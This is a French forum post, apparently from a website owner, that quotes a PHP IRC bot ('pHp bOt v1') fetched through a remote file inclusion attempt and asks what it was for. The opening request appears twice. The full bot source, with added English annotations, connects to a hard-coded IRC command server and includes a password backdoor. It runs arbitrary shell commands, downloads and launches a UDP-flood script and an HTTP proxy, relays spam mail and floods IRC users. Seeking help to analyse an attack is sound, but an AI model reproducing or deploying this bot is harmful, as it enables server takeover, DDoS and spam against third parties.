Bonjour,
Apparemment, une personne vient d'essayer une injection dans une de mes url.
J'aurais voulu avoir votre avis, pour savoir si c'est malveillant, car j'ai son IP.
Voici l'url qu'elle a tenté de mettre dans une variable d'une de mes pages.
http://oitech69.iquebec.com/socket.txt
Voici ce que contient ce socket.txt:
A votre avis, c'était quoi le but?
merci
Apparemment, une personne vient d'essayer une injection dans une de mes url.
J'aurais voulu avoir votre avis, pour savoir si c'est malveillant, car j'ai son IP.
Voici l'URL qu'elle a tenté de passer dans un paramètre d'une de mes pages (le schéma — une URL pointant vers un fichier PHP, injectée dans une variable de la page — correspond à une tentative d'inclusion de fichier distant, « remote file inclusion ») :
http://oitech69.iquebec.com/socket.txt
Voici ce que contient ce socket.txt:
<?php
// --- Malware sample: PHP IRC bot ("pHp bOt v1"), fetched from the URL the attacker injected. ---
// Silence every PHP error/notice so nothing leaks into the victim's page output or logs.
error_reporting(0);
set_magic_quotes_runtime(0);
// Remove all execution-time limits: the bot is meant to run forever inside the web-server process.
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
// safe_mode state is reported back to the operator (see the !safemode / !info commands below).
$safe = @ini_get('safe_mode');
// Start timestamp, used by the !uptime command.
$up = time();
// Builds a pseudo-random lowercase string of $length characters, used for throw-away
// IRC nick / ident / realname values so the bot is harder to track on the network.
// NOTE(review): $pattern has 26 characters but the index is rand(0,35); indexes 26-35
// read past the end and append nothing (the notice is hidden by error_reporting(0)),
// so the result can be shorter than $length. $key is also never initialised.
function randomkeys($length)
{
$pattern = "abcdefghijklmnopqrstuvwxyz";
for($i=0;$i<$length;$i++)
{
$key .= $pattern{rand(0,35)};
}
return $key;
}
$quitmsg = "FIND YOUR OWN";
// Address of the client that triggered the inclusion (reported by !from).
$ip = $_SERVER['REMOTE_ADDR'];
// Host + request URI of the vulnerable page: lets the operator find the injection point again (!link).
$HTTP_HOST = getenv("HTTP_HOST");
$REQUEST_URI = getenv("REQUEST_URI");
$infoo = "Link: $HTTP_HOST$REQUEST_URI";
// Reconnaissance of the compromised host: shell, download tools, safe_mode, PHP version, uids, OS.
if (@file_exists("/bin/sh")) $pro2="/bin/sh Yes"; else $pro2="/bin/sh No";
if (@file_exists("/usr/bin/wget")) $pro3="/usr/bin/wget Yes"; else $pro3="/usr/bin/wget No";
if (@file_exists("/usr/bin/lynx")) $pro4="/usr/bin/lynx Yes" ; else $pro4="/usr/bin/lynx No";
if ($safe) $pro5="safe_mode Yes"; else $pro5="safe_mode No";
$pro6 = "PHP ".phpversion();
$login=@posix_getuid(); $euid=@posix_geteuid(); $gid=@posix_getgid();
$mn1 = php_uname();
$mn2 = PHP_OS;
$version = "pHp bOt v1";
// Command-and-control: an IRC server (port 6667) and channel the bot joins and waits in.
$server = "69.16.172.34";
$port = '6667';
// Random identity so each infected host shows up under a different nick.
$identd = randomkeys(4).rand(100,999);
$me = randomkeys(4).rand(100,999);
$chan = "#botmaking";
// Operator authentication: double-MD5 of the controller's IRC host mask ($vhost, $vhost2)
// or a literal host ($vhost3). Anyone whose host matches may drive every command below.
$vhost = "fd8655d9b07e4f774658f19e29660abc";
$vhost2 = "5de2b1cb35aa7bd00bf878bd5a0f24f0";
$vhost3 = 'lekiki.users.undernet.org';
$ircname = randomkeys(4).rand(100,999);
// Outer loop never ends: on disconnect the bot sleeps 60 s and reconnects (see the bottom).
while(0==0) {
$ircsock = @fsockopen($server, $port);
if (!$ircsock) { echo "Échec a la connection.\n"; }
if ($ircsock) {
// IRC registration (USER / NICK).
fputs($ircsock,"USER $identd $me $server :$ircname\r\nNICK $me\r\n");
// Connection timestamp, used by !online.
$on = time();
while (!feof($ircsock)) {
$rawbuffer = fgets($ircsock, 2048);
$buffer = explode(" ", $rawbuffer);
// Keep-alive.
if( $buffer[0] == 'PING') {
fputs($ircsock,"PONG $buffer[1] \r\n");
}
// 001 = welcome: join the control channel.
if( $buffer[1] == '001') {
fputs($ircsock,"JOIN $chan\r\n");
fputs($ircsock,"WHO $me\r\n");
}
// Server refused the connection ("too many connections from your host"): give up this attempt.
if( $buffer[7]." ".$buffer[8]." ".$buffer[9]." ".$buffer[10] == 'many connections from your' ) {
exit;
}
// 433 = nickname in use.
if( $buffer[1] == '433') {
if (!isset($me2)) {
// NOTE(review): the new random name is discarded (not assigned to $me), so the same
// nick is re-sent and this branch repeats for as long as the collision lasts.
randomkeys(4).rand(100,999);
fputs($ircsock,"NICK $me\r\n");
}
if (isset($me2)) {
$me = $me2;
unset($me2);
}
}
// NOTE(review): the pattern as reproduced here has unbalanced parentheses (the leading
// ":(" groups appear to have been eaten by the forum's emoticon rendering). As shown it
// would not compile and, with errors silenced, $block stays empty; in the original the
// groups are presumably nick, ident, host, action, target and message, in that order.
$pattern = '/^.*)!(.*)@(.*\S+) (\S+) (\S+) .*)$/'; //This is the regex pattern I use to parse a buffer
preg_match($pattern, trim($rawbuffer), $block); //This parses the buffer
$nick = $block[1]; //Nickname
$ident = $block[2]; //Ident
$host = $block[3]; //Host
$action = $block[4]; //Action: PRIVMSG, MODE, NOTICE, etc.
$who = $block[5]; //Who: either a channel or you
$msg = $block[6]; //Msg: What was said. This can be parsed again using explode()
// Message split into words; $ff[0] is the command keyword.
$ff = explode(" ", $msg);
// Commands everyone has access to (no host check).
// Auto-op: when an authorised host joins, give it channel operator status.
if ( $buffer[1] == 'JOIN' ) {
$tbk = explode("\r", $buffer[2]);
$hostname = explode("@", $buffer[0]);
$vv = explode(":", $buffer[0]);
$pseudo = explode("!", $vv[1]);
if ( md5(md5($hostname[1])) == $vhost || md5(md5($hostname[1])) == $vhost2 || $hostname[1] == $vhost3 ) {
fputs($ircsock, "mode $tbk[0] +o $pseudo[0]\r\n");
}
}
// Rejoin immediately if kicked.
if ( $buffer[1] == 'KICK' ) {
$tbk = explode("\r", $buffer[3]);
if ( $tbk[0] == $me ) {
fputs($ircsock, "JOIN $buffer[2]\r\n");
}
}
// Password backdoor: anyone who knows the secret (double-MD5 compared against a hard-coded
// hash) registers their own host as $vhost3 and gains full control of the bot.
if ( $ff[0] == '!asshole' ) {
if (md5(md5($ff[1])) === 'b761061f4e0ba2030bcd344cc267e98f') {
$vhost3 = $host;
fputs($ircsock, "notice $nick :Host: $host\r\n");
}
}
// Commands restricted to an authorised host (the "protect host" gate).
if ( md5(md5($host)) == $vhost || md5(md5($host)) == $vhost2 || $host == $vhost3 ) {
$tbk = explode("\r", $buffer[2]);
$hostname = explode("@", $buffer[0]);
$vv = explode(":", $buffer[0]);
$pseudo = explode("!", $vv[1]);
// !mail <to> <subject> <body> <headers>: send e-mail from the victim server (spam relay).
if ( $ff[0] == '!mail' ) {
$recipient = $ff[1];
$subject = $ff[2];
$message = $ff[3];
$headers = $ff[4];
mail($recipient,$subject,$message,$headers);
fputs($ircsock, "notice $nick :Mail envoyer a $recipient\r\n");
}
// !rnick: pick a fresh random nick.
if ( $ff[0].$ff[1] == '!rnick' ) {
$me = randomkeys(4).rand(100,999);
fputs($ircsock, "NICK $me\r\n");
}
// !ssh <command...>: despite the name this is plain remote code execution — up to 20 words
// are joined and passed to shell_exec(), and every output line is sent back to the channel.
if ( $ff[0] == '!ssh' ) {
if ($ff[1]) {
$test = $ff[1]." ".$ff[2]." ".$ff[3]." ".$ff[4]." ".$ff[5]." ".$ff[6]." ".$ff[7]." ".$ff[8]." ".$ff[9]." ".$ff[10]." ".$ff[11]." ".$ff[12]." ".$ff[13]." ".$ff[14]." ".$ff[15]." ".$ff[16]." ".$ff[17]." ".$ff[18]." ".$ff[19]." ".$ff[20];
$chk = explode(chr(10), shell_exec($test));
$c = count ($chk);
for($i=0; $i<=$c; $i++) {
fputs($ircsock, "privmsg $who :$chk[$i]\r\n");
}
}
}
// !from: report the IP that triggered the inclusion.
if ( $ff[0] == '!from' ) {
fputs($ircsock, "PRIVMSG $who :Started From: $ip\r\n");
}
if ( $ff[0] == '!safemode' ) {
fputs($ircsock, "PRIVMSG $who :Safe_mode: $safe\r\n");
}
// !flood <nick>: IRC flood / bogus DCC offers aimed at another user.
if ( $ff[0] == '!flood' ) {
fputs($ircsock, "PRIVMSG ".$ff[1]." :DCC SEND sucker.exe 3586902543 1024 1064966\r\n");
fputs($ircsock, "PRIVMSG ".$ff[1]." :DCC CHAT 3586902543 1024 106496\r\n");
fputs($ircsock, "PRIVMSG ".$ff[1]." :NOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOb\r\n");
fputs($ircsock, "PRIVMSG ".$ff[1]." :NOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOb\r\n");
}
// !uptime: time since the script started ($up), formatted as days/hrs/mins/secs.
// NOTE(review): floor($days * $days) should be $days * 86400; the hours figure is wrong past day 1.
if ( $ff[0].$ff[1] == '!uptime' ) {
unset($uptime);
$delais = time()-$up;
$days = floor($delais / "86400");
if ($days != '0') { $uptime = $days." days, "; }
$now = $delais - floor($days * $days);
$hours = floor($now / "3600");
if ($hours != '0') {
if (isset($uptime)) { $uptime .= " ".$hours." hrs,"; }
if (!isset($uptime)) { $uptime = $hours." hrs,"; }
}
if ($hours == '0') {
if (isset($uptime)) { $uptime .= " 0 hrs,"; }
if (!isset($uptime)) { $uptime = "0 hrs,"; }
}
$now = $now - floor($hours * "3600");
$minutes = floor($now / "60");
if ($minutes != '0') { $uptime .= " ".$minutes." mins,"; }
if ($minutes == '0') { $uptime .= " 0 mins,"; }
$secondes = $now - floor($minutes * "60");
$uptime .= " ".$secondes." secs";
fputs($ircsock, "PRIVMSG $who :b0t Uptime: $uptime.\r\n");
}
// !online: same computation, measured from the current IRC connection ($on).
if ( $ff[0].$ff[1] == '!online' ) {
unset($uptime);
$delais = time()-$on;
$days = floor($delais / "86400");
if ($days != '0') { $uptime = $days." days, "; }
$now = $delais - floor($days * $days);
$hours = floor($now / "3600");
if ($hours != '0') {
if (isset($uptime)) { $uptime = $uptime." ".$hours." hrs,"; }
if (!isset($uptime)) { $uptime = $hours." hrs,"; }
}
if ($hours == '0') {
if (isset($uptime)) { $uptime = $uptime." 0 hrs,"; }
if (!isset($uptime)) { $uptime = "0 hrs,"; }
}
$now = $now - floor($hours * "3600");
$minutes = floor($now / "60");
if ($minutes != '0') { $uptime = $uptime." ".$minutes." mins,"; }
if ($minutes == '0') { $uptime = $uptime." 0 mins,"; }
$secondes = $now - floor($minutes * "60");
$uptime = $uptime." ".$secondes." secs";
fputs($ircsock, "PRIVMSG $who :Server Uptime: $uptime.\r\n");
}
// !ip: number of non-loopback interface addresses on the host (via ifconfig).
if ( $ff[0].$ff[1] == '!ip' ) {
$test = "ifconfig |grep inet |grep -v 127.0.0.1 |wc -l |sed 's/ //g'";
$chk = shell_exec($test);
fputs($ircsock, "notice $nick :Total IP: $chk\r\n");
}
if ( $ff[0].$ff[1] == '!uname' ) {
fputs($ircsock, "notice $nick : $mn1 $mn2\r\n");
}
if ( $ff[0].$ff[1] == '-uname' ) {
fputs($ircsock, "privmsg $who : $mn1 $mn2\r\n");
}
if ( $ff[0].$ff[1] == '!channels' ) {
fputs($ircsock, "notice $nick :Channels lists: $chan\r\n");
}
if ( $ff[0] == '!nick' ) {
if ($ff[1]) {
fputs($ircsock, "NICK $ff[1]\r\n");
}
}
// !link: reveal the vulnerable URL so the operator can re-infect the host later.
if ( $ff[0].$ff[1] == '!link' ) {
fputs($ircsock, "notice $nick :$infoo\r\n");
}
if ( $ff[0].$ff[1] == '!info' ) {
$test = "ifconfig |grep inet |grep -v 127.0.0.1 |wc -l |sed 's/ //g'";
$chk = shell_exec($test);
fputs($ircsock, "notice $nick :$pro2, $pro3, $pro4, $pro5, Total IP: $chk\r\n");
}
// !ifudp: is the UDP-flood tool already dropped at /tmp/a.pl?
if ( $ff[0] == '!ifudp' ) {
if (file_exists('/tmp/a.pl')) {
fputs($ircsock, "notice $nick :$infoo\r\n");
}
}
// !udpstop: kill the running flood (all sleep/perl processes of this user).
if ( $ff[0] == '!udpstop' ) {
$udpstop = "killall -9 sleep;killall -9 perl";
shell_exec($udpstop);
}
// !udp <target> <port> <seconds>: DDoS. Downloads a public UDP-flood Perl script over raw
// HTTP into /tmp/a.pl (the request has no HTTP version/terminating blank line, so whatever
// the server answers, headers included, is written to the file) and runs it in the background.
if ( $ff[0] == '!udp' ) {
if ($ff[3]) {
if (!file_exists('/tmp/a.pl')) {
$udp = fsockopen("packetstormsecurity.org", "80", $errno, $errstr, 2048);
fputs($udp,"GET /DoS/udp.pl \r\nHOST: packetstormsecurity.org\r\n");
define('FILE_NAME', '/tmp/a.pl');
if ($file = fopen(FILE_NAME, 'a'))
{
while (!feof($udp)) {
$rawudp = fgets($udp, 2048);
fwrite($file, $rawudp );
}
fclose($file);
}
}
if (file_exists('/tmp/a.pl')) {
$kill = "cd /tmp/;perl a.pl ".$ff[1]." ".$ff[2]." ".$ff[3];
popen($kill.' &', 'r');
fputs($ircsock, "notice $nick :Udp send to $ff[1] delays $ff[3] seconds\r\n");
}
}
}
// !proxy start: drop a CPAN HTTP proxy script at /tmp/.proxy.pl and run it, turning the
// victim into an open HTTP proxy (port 8888 according to the message sent back).
if ( $ff[0] == '!proxy' ) {
if ($ff[1] == 'start') {
if (!file_exists('/tmp/.proxy.pl')) {
$udp = fsockopen("www.cpan.org", "80", $errno, $errstr, 2048);
fputs($udp,"GET /authors/id/D/DO/DODYSW/httpproxy-1.5.3.pl \r\nHOST: www.cpan.org\r\n");
define('FILE_NAME', '/tmp/.proxy.pl');
if ($file = fopen(FILE_NAME, 'a'))
{
while (!feof($udp)) {
$rawudp = fgets($udp, 2048);
fwrite($file, $rawudp );
}
fclose($file);
}
}
if (file_exists('/tmp/.proxy.pl')) {
$kill = "cd /tmp/;perl .proxy.pl";
popen($kill.' &', 'r');
$bn=shell_exec('uname -n');
fputs($ircsock, "privmsg $who :Http Proxy Created port:8888 $bn\r\n");
}
}
}
//http://www.cpan.org/authors/id/D/DO/DODYSW/httpproxy-1.5.3.pl
// !server <host> then !jump: C2 migration — QUIT makes the outer loop reconnect to the new server.
if ( $ff[0] == '!server' ) {
if ($ff[1]) {
$server = $ff[1];
fputs($ircsock, "notice $nick :Server set to ".$ff[1]."\r\n");
}
}
if ( $ff[0].$ff[1] == '!jump' ) {
fputs($ircsock, "QUIT switching server\r\n");
}
// !maxsq <nick>: oversized colour-coded messages meant to push the target over its SendQ and disconnect it.
if ( $ff[0] == '!maxsq' ) {
if ($ff[1]) {
fputs($ircsock, "PRIVMSG ".$ff[1]." :15MaXseNDQeXceeDeDMaXseNDQeXceeDeDMaXseNDQeXceeDeD3MaXseNDQeXceeDeDMaXseNDQeXceeDeDMaXseNDQeXceeDeD3MaXseNDQeXceeDeDMaXseNDQeXceeDeDMaXseNDQeXceeDeD3MaXseNDQeXceeDeD3MaXseNDQeXceeDeDMaXseNDQeXceeDeDMaXseNDQeXceeDeD3MaXseNDQeXceeDeDM\r\n");
fputs($ircsock, "PRIVMSG ".$ff[1]." :15MaXseNDQeXceeDeDMaXseNDQeXceeDeDMaXseNDQeXceeDeD3MaXseNDQeXceeDeDMaXseNDQeXceeDeDMaXseNDQeXceeDeD3MaXseNDQeXceeDeDMaXseNDQeXceeDeDMaXseNDQeXceeDeD3MaXseNDQeXceeDeD3MaXseNDQeXceeDeDMaXseNDQeXceeDeDMaXseNDQeXceeDeD3MaXseNDQeXceeDeDM\r\n");
}
}
// Nick-addressed form: "<nick or prefix*> !cmd ..." targets one specific bot in the channel.
// NOTE(review): eregi() is called with operator-supplied text as the pattern; errors are silenced.
$cmptmp = str_replace("*","", $ff[0]);
if ( $cmptmp == $me || substr($me,0,strlen($cmptmp))==$cmptmp && @eregi($cmptmp, $me) ) {
if ( $ff[1] == '!nick' && $ff[2] ) {
$me2 = $me;
$me = $ff[2];
fputs($ircsock, "NICK $ff[2]\r\n");
}
if ( $ff[1] == '!server' ) {
if ($ff[2]) {
$server = $ff[2];
fputs($ircsock, "notice $nick :Server set to ".$ff[2]."\r\n");
}
}
if ( $ff[1].$ff[2] == '!jump' ) {
fputs($ircsock, "QUIT switching server\r\n");
}
if ( $ff[1].$ff[2] == '!channels' ) {
fputs($ircsock, "notice $nick :Channels lists: $chan\r\n");
}
if ( $ff[1] == '!identd' ) {
if ($ff[2]) {
$identd = $ff[2];
fputs($ircsock, "notice $nick :Identd set to ".$ff[2]."\r\n");
}
}
if ( $ff[1] == '!ircname' ) {
if ($ff[2]) {
$ircname = $ff[2]." ".$ff[3]." ".$ff[4]." ".$ff[5]." ".$ff[6]." ".$ff[7]." ".$ff[8]." ".$ff[9]." ".$ff[10];
fputs($ircsock, "notice $nick :New IRCname set\r\n");
}
}
// !md5 <hash>: look the hash up on an online MD5 reverse-lookup site and report the plaintext.
if ( $ff[1] == '!md5' ) {
if ( $ff[2] ) {
$h = $ff[2];
$len = strlen ($h) + 18;
$ircsockdd = fsockopen("www.csthis.com", "80", $errno, $errstr, 2048);
fputs($ircsockdd,"POST /md5/indexgoogle.php HTTP/1.0\r\n");
fputs($ircsockdd,"Host: www.csthis.com\r\n");
fputs($ircsockdd,"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4\r\n");
fputs($ircsockdd,"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n");
fputs($ircsockdd,"Accept-Language: en-us,en;q=0.5\r\n");
fputs($ircsockdd,"Accept-Encoding: gzip,deflate\r\n");
fputs($ircsockdd,"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n");
fputs($ircsockdd,"Keep-Alive: 300\r\n");
fputs($ircsockdd,"Connection: keep-alive\r\n");
fputs($ircsockdd,"Referer: http://www.csthis.com/md5/indexgoogle.php\r\n");
fputs($ircsockdd,"Content-Type: application/x-www-form-urlencoded\r\n");
fputs($ircsockdd,"Content-Length: $len\r\n");
fputs($ircsockdd,"\r\n");
fputs($ircsockdd,"h=".$h."&s=Search%2FPost\r\n");
while (!feof($ircsockdd)) {
$rawbufferdd = fgets($ircsockdd, 1024);
if(ereg('MD5 hash:', $rawbufferdd)) {
$chk = explode(" ", $rawbufferdd);
$chk2 = explode(">", $chk[13]);
$chk3 = explode("<", $chk2[1]);
fputs($ircsock, "privmsg $who : MD5 hash: $h resolves to: ".$chk3[0]."\r\n");
}
}
}
}
if ( $ff[1].$ff[2] == '!ip' ) {
$test = "ifconfig |grep inet |grep -v 127.0.0.1 |wc -l |sed 's/ //g'";
$chk = shell_exec($test);
fputs($ircsock, "notice $nick :Total IP: $chk\r\n");
}
// !bg <command...>: run a shell command in the background, output appended to /var/tmp/.c.
if ( $ff[1] == '!bg' ) {
$test = $ff[2]." ".$ff[3]." ".$ff[4]." ".$ff[5]." ".$ff[6]." ".$ff[7]." ".$ff[8]." ".$ff[9]." ".$ff[10];
popen($test.' >> /var/tmp/.c&', 'r');
}
if ( $ff[1].$ff[2] == '!uname' ) {
fputs($ircsock, "notice $nick : $mn1 $mn2\r\n");
}
if ( $ff[1].$ff[2] == '!link' ) {
fputs($ircsock, "notice $nick :$infoo\r\n");
fputs($ircsock, "notice $nick :$pro2, $pro3, $pro4, $pro5, $pro6\r\n");
}
if ( $ff[1].$ff[2] == '!info' ) {
$test = "ifconfig |grep inet |grep -v 127.0.0.1 |wc -l |sed 's/ //g'";
$chk = shell_exec($test);
fputs($ircsock, "notice $nick :$pro2, $pro3, $pro4, $pro5, Total IP: $chk, \r\n");
}
// !quit: the only command that ends the bot process.
if ( $ff[1] == '!quit' ) {
fputs($ircsock, "quit : $quitmsg \r\n");
exit(0);
}
// !part [channel]: leave a channel and drop it from the comma-separated $chan list.
if ( $ff[1] == '!part' ) {
if (!$ff[2]) {
fputs($ircsock, "part $who\r\n");
$chk = explode(",", $chan);
$c = count ($chk);
for($i=0; $i<$c; $i++) {
if ($chk[$i] != $who) {
if (!isset($chan2)) { $chan2=$chk[$i]; }
else { $chan2=$chan2.",".$chk[$i]; }
}
}
$chan=$chan2;
unset($chan2);
}
else {
fputs($ircsock, "part $ff[2]\r\n");
$chk = explode(",", $chan);
$c = count ($chk);
for($i=0; $i<$c; $i++) {
if ($chk[$i] != $ff[2]) {
if (!isset($chan2)) { $chan2=$chk[$i]; }
else { $chan2=$chan2.",".$chk[$i]; }
}
}
$chan=$chan2;
unset($chan2);
}
}
// !join <channel>: join and append to the $chan list (removing any existing duplicate first).
if ( $ff[1] == '!join' ) {
if ($ff[2]) {
fputs($ircsock, "join $ff[2]\r\n");
$chk = explode(",", $chan);
$c = count ($chk);
for($i=0; $i<$c; $i++) {
if ($chk[$i] != $ff[2]) {
if (!isset($chan2)) { $chan2=$chk[$i]; }
else { $chan2=$chan2.",".$chk[$i]; }
}
}
$chan=$chan2;
unset($chan2);
if (isset($chan)) { $chan = $chan.",".$ff[2]; }
else { $chan = $ff[2]; }
}
}
// Nick-addressed remote code execution, same as the channel-wide !ssh above (up to 14 words).
if ( $ff[1] == '!ssh' ) {
if ($ff[2]) {
$test = $ff[2]." ".$ff[3]." ".$ff[4]." ".$ff[5]." ".$ff[6]." ".$ff[7]." ".$ff[8]." ".$ff[9]." ".$ff[10]." ".$ff[11]." ".$ff[12]." ".$ff[13]." ".$ff[14]." ".$ff[15];
$chk = explode(chr(10), shell_exec($test));
$c = count ($chk);
for($i=0; $i<=$c; $i++) {
fputs($ircsock, "privmsg $who :$chk[$i]\r\n");
}
}
}
}
// !msg <target> <text...>: relay a message to any nick or channel.
if ( $ff[0] == '!msg' ) {
if ($ff[1]) {
fputs($ircsock, "PRIVMSG {$ff[1]} :".$ff[2]." ".$ff[3]." ".$ff[4]." ".$ff[5]." ".$ff[6]." ".$ff[7]." ".$ff[8]." ".$ff[9]." ".$ff[10]."\r\n");
}
}
if ( $ff[0].$ff[1] == '!quit' ) {
fputs($ircsock, "quit : $quitmsg \r\n");
exit(0);
}
if ( $ff[0] == '!part' ) {
if (!$ff[1]) {
fputs($ircsock, "part $who\r\n");
$chk = explode(",", $chan);
$c = count ($chk);
for($i=0; $i<$c; $i++) {
if ($chk[$i] != $who) {
if (!isset($chan2)) { $chan2=$chk[$i]; }
else { $chan2=$chan2.",".$chk[$i]; }
}
}
$chan=$chan2;
unset($chan2);
}
else {
fputs($ircsock, "part $ff[1]\r\n");
$chk = explode(",", $chan);
$c = count ($chk);
for($i=0; $i<$c; $i++) {
if ($chk[$i] != $ff[1]) {
if (!isset($chan2)) { $chan2=$chk[$i]; }
else { $chan2=$chan2.",".$chk[$i]; }
}
}
$chan=$chan2;
unset($chan2);
}
}
if ( $ff[0] == '!join' ) {
if ($ff[1]) {
fputs($ircsock, "join $ff[1]\r\n");
$chk = explode(",", $chan);
$c = count ($chk);
for($i=0; $i<$c; $i++) {
if ($chk[$i] != $ff[1]) {
if (!isset($chan2)) { $chan2=$chk[$i]; }
else { $chan2=$chan2.",".$chk[$i]; }
}
}
$chan=$chan2;
unset($chan2);
if (isset($chan)) { $chan = $chan.",".$ff[1]; }
else { $chan = $ff[1]; }
}
}
// -up / -down: give or remove channel operator status for the sender.
if ( $ff[0].$ff[1] == '-up' ) {
fputs($ircsock, "mode $who +o $nick\r\n");
}
if ( $ff[0].$ff[1] == '-down' ) {
fputs($ircsock, "mode $who -o $nick\r\n");
}
if ( $ff[0].$ff[1] == '!version' ) {
fputs($ircsock, "privmsg $who :$version\r\n");
}
}
//echo $rawbuffer;
}
}
// Connection lost or never established: wait a minute and retry forever (persistence).
fclose($ircsock);
sleep(60);
}
?>
A votre avis, c'était quoi le but?
merci